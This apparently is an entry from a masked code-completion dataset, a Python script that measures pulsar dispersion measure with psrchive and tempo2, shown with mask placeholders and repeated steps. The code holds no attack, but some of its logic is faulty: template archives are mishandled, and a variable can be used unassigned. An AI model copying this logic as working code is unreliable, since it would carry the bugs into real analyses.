print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... '),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\nmain()\n",
"step-3": "<mask token>\nmatplotlib.use('Agg')\n<mask token>\nstart = time.time()\nparser = argparse.ArgumentParser(description='Code for measuring in-band ' +\n 'DM for pulsar data in psrfits format.')\nparser.add_argument('files', nargs='+', type=str, help=\n 'The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, help=\n 'Ephemeris file to update the model. Exits if not ' +\n 'given or is not available in \"PWD/ephemerides\" ' + 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str, help=\n 'Model template for ToA generation. Exits if not ' +\n 'given or is not available in \"PWD/templates\" ' + 'directory')\nparser.add_argument('-f', '--fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f', '--b3fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f', '--b5fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w', '--writeout', action='store_true', help=\n 'Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa', '--print_toas', action='store_true', help=\n 'Print the prefit ToAs to file in tempo2 format. ' + 'Def: False')\nparser.add_argument('-F', '--Fscrunch', action='store_true', help=\n 'Fully scrunch the number of channels for the ' +\n 'final output archive (Def: False)')\nparser.add_argument('-T', '--Tscrunch', action='store_true', help=\n 'Completely time scrunch all the integrations')\nparser.add_argument('-t', '--tscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of integrations for ' +\n 'the final output archive (Def: None)')\nparser.add_argument('-o', '--offset', type=float, default=0.670520675, help\n ='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', help=\n 'Only print warnings')\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... '\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... '),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n 